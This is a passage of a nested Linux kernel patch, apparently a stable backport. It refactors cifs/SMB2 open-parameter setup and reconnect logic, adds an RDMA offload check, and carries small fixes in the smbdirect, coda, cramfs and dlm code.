+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb,
+-						    OPEN_REPARSE_POINT);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb,
++						      OPEN_REPARSE_POINT),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+@@ -1115,15 +1118,16 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						    CREATE_OPTION_SPECIAL);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 6c84d2983166a..e1491440e8f1f 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -104,14 +104,15 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		goto finished;
+ 	}
+ 
+-	vars->oparms.tcon = tcon;
+-	vars->oparms.desired_access = desired_access;
+-	vars->oparms.disposition = create_disposition;
+-	vars->oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	vars->oparms.fid = &fid;
+-	vars->oparms.reconnect = false;
+-	vars->oparms.mode = mode;
+-	vars->oparms.cifs_sb = cifs_sb;
++	vars->oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = desired_access,
++		.disposition = create_disposition,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++		.mode = mode,
++		.cifs_sb = cifs_sb,
++	};
+ 
+ 	rqst[num_rqst].rq_iov = &vars->open_iov[0];
+ 	rqst[num_rqst].rq_nvec = SMB2_CREATE_IOV_SIZE;
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 78c2d618eb511..6da495f593e17 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -729,12 +729,13 @@ smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid = NULL;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = open_cached_dir(xid, tcon, "", cifs_sb, false, &cfid);
+ 	if (rc == 0)
+@@ -771,12 +772,13 @@ smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_open_parms oparms;
+ 	struct cifs_fid fid;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -816,12 +818,13 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!utf16_path)
+ 		return -ENOMEM;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       &err_iov, &err_buftype);
+@@ -1097,13 +1100,13 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_WRITE_EA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_WRITE_EA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -1453,12 +1456,12 @@ smb2_ioctl_query_info(const unsigned int xid,
+ 	rqst[0].rq_iov = &vars->open_iov[0];
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
+ 
+ 	if (qi.flags & PASSTHRU_FSCTL) {
+ 		switch (qi.info_type & FSCTL_DEVICE_ACCESS_MASK) {
+@@ -2088,12 +2091,13 @@ smb3_notify(const unsigned int xid, struct file *pfile,
+ 	}
+ 
+ 	tcon = cifs_sb_master_tcon(cifs_sb);
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+ 		       NULL);
+@@ -2159,12 +2163,13 @@ smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -2490,12 +2495,13 @@ smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = desired_access;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = desired_access,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -2623,12 +2629,13 @@ smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!tcon->posix_extensions)
+ 		return smb2_queryfs(xid, tcon, cifs_sb, buf);
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -2916,13 +2923,13 @@ smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -3056,13 +3063,13 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -3196,17 +3203,20 @@ get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 		return ERR_PTR(rc);
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = READ_CONTROL;
+-	oparms.disposition = FILE_OPEN;
+-	/*
+-	 * When querying an ACL, even if the file is a symlink we want to open
+-	 * the source not the target, and so the protocol requires that the
+-	 * client specify this flag when opening a reparse point
+-	 */
+-	oparms.create_options = cifs_create_options(cifs_sb, 0) | OPEN_REPARSE_POINT;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = READ_CONTROL,
++		.disposition = FILE_OPEN,
++		/*
++		 * When querying an ACL, even if the file is a symlink
++		 * we want to open the source not the target, and so
++		 * the protocol requires that the client specify this
++		 * flag when opening a reparse point
++		 */
++		.create_options = cifs_create_options(cifs_sb, 0) |
++				  OPEN_REPARSE_POINT,
++		.fid = &fid,
++	};
+ 
+ 	if (info & SACL_SECINFO)
+ 		oparms.desired_access |= SYSTEM_SECURITY;
+@@ -3265,13 +3275,14 @@ set_smb2_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+ 		return rc;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = access_flags;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -5133,15 +5144,16 @@ smb2_make_node(unsigned int xid, struct inode *inode,
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						    CREATE_OPTION_SPECIAL);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 2c9ffa921e6f6..23926f754d2aa 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -139,6 +139,66 @@ out:
+ 	return;
+ }
+ 
++static int wait_for_server_reconnect(struct TCP_Server_Info *server,
++				     __le16 smb2_command, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
++	 * here since they are implicitly done when session drops.
++	 */
++	switch (smb2_command) {
++	/*
++	 * BB Should we keep oplock break and add flush to exceptions?
++	 */
++	case SMB2_TREE_DISCONNECT:
++	case SMB2_CANCEL:
++	case SMB2_CLOSE:
++	case SMB2_OPLOCK_BREAK:
++		return -EAGAIN;
++	}
++
++	/*
++	 * Give demultiplex thread up to 10 seconds to each target available for
++	 * reconnect -- should be greater than cifs socket timeout which is 7
++	 * seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until
++	 * process is killed or server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
++
+ static int
+ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	       struct TCP_Server_Info *server)
+@@ -146,7 +206,6 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	int rc = 0;
+ 	struct nls_table *nls_codepage;
+ 	struct cifs_ses *ses;
+-	int retries;
+ 
+ 	/*
+ 	 * SMB2s NegProt, SessSetup, Logoff do not have tcon yet so
+@@ -184,61 +243,11 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	    (!tcon->ses->server) || !server)
+ 		return -EIO;
+ 
+-	ses = tcon->ses;
+-	retries = server->nr_targets;
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 */
+-	while (server->tcpStatus == CifsNeedReconnect) {
+-		/*
+-		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-		 * here since they are implicitly done when session drops.
+-		 */
+-		switch (smb2_command) {
+-		/*
+-		 * BB Should we keep oplock break and add flush to exceptions?
+-		 */
+-		case SMB2_TREE_DISCONNECT:
+-		case SMB2_CANCEL:
+-		case SMB2_CLOSE:
+-		case SMB2_OPLOCK_BREAK:
+-			return -EAGAIN;
+-		}
+-
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      10 * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to a received signal by the process\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			break;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (retries && --retries)
+-			continue;
++	rc = wait_for_server_reconnect(server, smb2_command, tcon->retry);
++	if (rc)
++		return rc;
+ 
+-		/*
+-		 * on "soft" mounts we wait once. Hard mounts keep
+-		 * retrying until process is killed or server comes
+-		 * back on-line
+-		 */
+-		if (!tcon->retry) {
+-			cifs_dbg(FYI, "gave up waiting on reconnect in smb_init\n");
+-			return -EHOSTDOWN;
+-		}
+-		retries = server->nr_targets;
+-	}
++	ses = tcon->ses;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+@@ -3898,7 +3907,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		goto done;
+ 
+ 	/* allocate a dummy tcon struct used for reconnect */
+-	tcon = kzalloc(sizeof(struct cifs_tcon), GFP_KERNEL);
++	tcon = tconInfoAlloc();
+ 	if (!tcon) {
+ 		resched = true;
+ 		list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
+@@ -3921,7 +3930,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		list_del_init(&ses->rlist);
+ 		cifs_put_smb_ses(ses);
+ 	}
+-	kfree(tcon);
++	tconInfoFree(tcon);
+ 
+ done:
+ 	cifs_dbg(FYI, "Reconnecting tcons and channels finished\n");
+@@ -4054,6 +4063,36 @@ SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+ 	return rc;
+ }
+ 
++#ifdef CONFIG_CIFS_SMB_DIRECT
++static inline bool smb3_use_rdma_offload(struct cifs_io_parms *io_parms)
++{
++	struct TCP_Server_Info *server = io_parms->server;
++	struct cifs_tcon *tcon = io_parms->tcon;
++
++	/* we can only offload if we're connected */
++	if (!server || !tcon)
++		return false;
++
++	/* we can only offload on an rdma connection */
++	if (!server->rdma || !server->smbd_conn)
++		return false;
++
++	/* we don't support signed offload yet */
++	if (server->sign)
++		return false;
++
++	/* we don't support encrypted offload yet */
++	if (smb3_encryption_required(tcon))
++		return false;
++
++	/* offload also has its overhead, so only do it if desired */
++	if (io_parms->length < server->smbd_conn->rdma_readwrite_threshold)
++		return false;
++
++	return true;
++}
++#endif /* CONFIG_CIFS_SMB_DIRECT */
++
+ /*
+  * To form a chain of read requests, any read requests after the first should
+  * have the end_of_chain boolean set to true.
+@@ -4097,9 +4136,7 @@ smb2_new_read_req(void **buf, unsigned int *total_len,
+ 	 * If we want to do a RDMA write, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of read request
+ 	 */
+-	if (server->rdma && rdata && !server->sign &&
+-		rdata->bytes >= server->smbd_conn->rdma_readwrite_threshold) {
+-
++	if (smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+@@ -4495,10 +4532,27 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	struct kvec iov[1];
+ 	struct smb_rqst rqst = { };
+ 	unsigned int total_len;
++	struct cifs_io_parms _io_parms;
++	struct cifs_io_parms *io_parms = NULL;
+ 
+ 	if (!wdata->server)
+ 		server = wdata->server = cifs_pick_channel(tcon->ses);
+ 
++	/*
++	 * in future we may get cifs_io_parms passed in from the caller,
++	 * but for now we construct it here...
++	 */
++	_io_parms = (struct cifs_io_parms) {
++		.tcon = tcon,
++		.server = server,
++		.offset = wdata->offset,
++		.length = wdata->bytes,
++		.persistent_fid = wdata->cfile->fid.persistent_fid,
++		.volatile_fid = wdata->cfile->fid.volatile_fid,
++		.pid = wdata->pid,
++	};
++	io_parms = &_io_parms;
++
+ 	rc = smb2_plain_req_init(SMB2_WRITE, tcon, server,
+ 				 (void **) &req, &total_len);
+ 	if (rc)
+@@ -4508,28 +4562,31 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 		flags |= CIFS_TRANSFORM_REQ;
+ 
+ 	shdr = (struct smb2_hdr *)req;
+-	shdr->Id.SyncId.ProcessId = cpu_to_le32(wdata->cfile->pid);
++	shdr->Id.SyncId.ProcessId = cpu_to_le32(io_parms->pid);
+ 
+-	req->PersistentFileId = wdata->cfile->fid.persistent_fid;
+-	req->VolatileFileId = wdata->cfile->fid.volatile_fid;
++	req->PersistentFileId = io_parms->persistent_fid;
++	req->VolatileFileId = io_parms->volatile_fid;
+ 	req->WriteChannelInfoOffset = 0;
+ 	req->WriteChannelInfoLength = 0;
+ 	req->Channel = 0;
+-	req->Offset = cpu_to_le64(wdata->offset);
++	req->Offset = cpu_to_le64(io_parms->offset);
+ 	req->DataOffset = cpu_to_le16(
+ 				offsetof(struct smb2_write_req, Buffer));
+ 	req->RemainingBytes = 0;
+ 
+-	trace_smb3_write_enter(0 /* xid */, wdata->cfile->fid.persistent_fid,
+-		tcon->tid, tcon->ses->Suid, wdata->offset, wdata->bytes);
++	trace_smb3_write_enter(0 /* xid */,
++			       io_parms->persistent_fid,
++			       io_parms->tcon->tid,
++			       io_parms->tcon->ses->Suid,
++			       io_parms->offset,
++			       io_parms->length);
++
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 	/*
+ 	 * If we want to do a server RDMA read, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of write request
+ 	 */
+-	if (server->rdma && !server->sign && wdata->bytes >=
+-		server->smbd_conn->rdma_readwrite_threshold) {
+-
++	if (smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+@@ -4581,14 +4638,14 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	}
+ #endif
+ 	cifs_dbg(FYI, "async write at %llu %u bytes\n",
+-		 wdata->offset, wdata->bytes);
++		 io_parms->offset, io_parms->length);
+ 
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 	/* For RDMA read, I/O size is in RemainingBytes not in Length */
+ 	if (!wdata->mr)
+-		req->Length = cpu_to_le32(wdata->bytes);
++		req->Length = cpu_to_le32(io_parms->length);
+ #else
+-	req->Length = cpu_to_le32(wdata->bytes);
++	req->Length = cpu_to_le32(io_parms->length);
+ #endif
+ 
+ 	if (wdata->credits.value > 0) {
+@@ -4596,7 +4653,7 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 						    SMB2_MAX_BUFFER_SIZE));
+ 		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
+ 
+-		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
++		rc = adjust_credits(server, &wdata->credits, io_parms->length);
+ 		if (rc)
+ 			goto async_writev_out;
+ 
+@@ -4609,9 +4666,12 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 
+ 	if (rc) {
+ 		trace_smb3_write_err(0 /* no xid */,
+-				     req->PersistentFileId,
+-				     tcon->tid, tcon->ses->Suid, wdata->offset,
+-				     wdata->bytes, rc);
++				     io_parms->persistent_fid,
++				     io_parms->tcon->tid,
++				     io_parms->tcon->ses->Suid,
++				     io_parms->offset,
++				     io_parms->length,
++				     rc);
+ 		kref_put(&wdata->refcount, release);
+ 		cifs_stats_fail_inc(tcon, SMB2_WRITE_HE);
+ 	}
+diff --git a/fs/cifs/smbdirect.c b/fs/cifs/smbdirect.c
+index 8c816b25ce7c6..cf923f211c512 100644
+--- a/fs/cifs/smbdirect.c
++++ b/fs/cifs/smbdirect.c
+@@ -1700,6 +1700,7 @@ static struct smbd_connection *_smbd_get_connection(
+ 
+ allocate_mr_failed:
+ 	/* At this point, need to a full transport shutdown */
++	server->smbd_conn = info;
+ 	smbd_destroy(server);
+ 	return NULL;
+ 
+@@ -2217,6 +2218,7 @@ static int allocate_mr_list(struct smbd_connection *info)
+ 	atomic_set(&info->mr_ready_count, 0);
+ 	atomic_set(&info->mr_used_count, 0);
+ 	init_waitqueue_head(&info->wait_for_mr_cleanup);
++	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+ 	/* Allocate more MRs (2x) than hardware responder_resources */
+ 	for (i = 0; i < info->responder_resources * 2; i++) {
+ 		smbdirect_mr = kzalloc(sizeof(*smbdirect_mr), GFP_KERNEL);
+@@ -2244,13 +2246,13 @@ static int allocate_mr_list(struct smbd_connection *info)
+ 		list_add_tail(&smbdirect_mr->list, &info->mr_list);
+ 		atomic_inc(&info->mr_ready_count);
+ 	}
+-	INIT_WORK(&info->mr_recovery_work, smbd_mr_recovery_work);
+ 	return 0;
+ 
+ out:
+ 	kfree(smbdirect_mr);
+ 
+ 	list_for_each_entry_safe(smbdirect_mr, tmp, &info->mr_list, list) {
++		list_del(&smbdirect_mr->list);
+ 		ib_dereg_mr(smbdirect_mr->mr);
+ 		kfree(smbdirect_mr->sgl);
+ 		kfree(smbdirect_mr);
+diff --git a/fs/coda/upcall.c b/fs/coda/upcall.c
+index 59f6cfd06f96a..cd6a3721f6f69 100644
+--- a/fs/coda/upcall.c
++++ b/fs/coda/upcall.c
+@@ -791,7 +791,7 @@ static int coda_upcall(struct venus_comm *vcp,
+ 	sig_req = kmalloc(sizeof(struct upc_req), GFP_KERNEL);
+ 	if (!sig_req) goto exit;
+ 
+-	sig_inputArgs = kvzalloc(sizeof(struct coda_in_hdr), GFP_KERNEL);
++	sig_inputArgs = kvzalloc(sizeof(*sig_inputArgs), GFP_KERNEL);
+ 	if (!sig_inputArgs) {
+ 		kfree(sig_req);
+ 		goto exit;
+diff --git a/fs/cramfs/inode.c b/fs/cramfs/inode.c
+index 61ccf7722fc3c..6dae27d6f553f 100644
+--- a/fs/cramfs/inode.c
++++ b/fs/cramfs/inode.c
+@@ -183,7 +183,7 @@ static void *cramfs_blkdev_read(struct super_block *sb, unsigned int offset,
+ 				unsigned int len)
+ {
+ 	struct address_space *mapping = sb->s_bdev->bd_inode->i_mapping;
+-	struct file_ra_state ra;
++	struct file_ra_state ra = {};
+ 	struct page *pages[BLKS_PER_BUF];
+ 	unsigned i, blocknr, buffer;
+ 	unsigned long devsize;
+diff --git a/fs/dlm/midcomms.c b/fs/dlm/midcomms.c
+index 6489bc22ad617..546c52c46b1c9 100644
+--- a/fs/dlm/midcomms.c
++++ b/fs/dlm/midcomms.c
+@@ -374,7 +374,7 @@ static int dlm_send_ack(int nodeid, uint32_t seq)
+ 	struct dlm_msg *msg;
+ 	char *ppc;
+ 
+-	msg = dlm_lowcomms_new_msg(nodeid, mb_len, GFP_NOFS, &ppc,
++	msg = dlm_lowcomms_new_msg(nodeid, mb_len, GFP_ATOMIC, &ppc,
+ 				   NULL, NULL);
+ 	if (!msg)
+ 		return -ENOMEM;
+@@ -401,7 +401,7 @@ static int dlm_send_fin(struct midcomms_node *node,
+ 	struct dlm_mhandle *mh;
+ 	char *ppc;
+ 
+-	mh = dlm_midcomms_get_mhandle(node->nodeid, mb_len, GFP_NOFS, &ppc);
++	mh = dlm_midcomms_get_mhandle(node->nodeid, mb_len, GFP_ATOMIC, &ppc);
+ 	if (!mh)
+ 		return -ENOMEM;
+ 
+@@ -483,15 +483,14 @@ static void dlm_midcomms_receive_buffer(union dlm_packet *p,
+ 
+ 		switch (p->header.h_cmd) {
+ 		case DLM_FIN:
+-			/* send ack before fin */
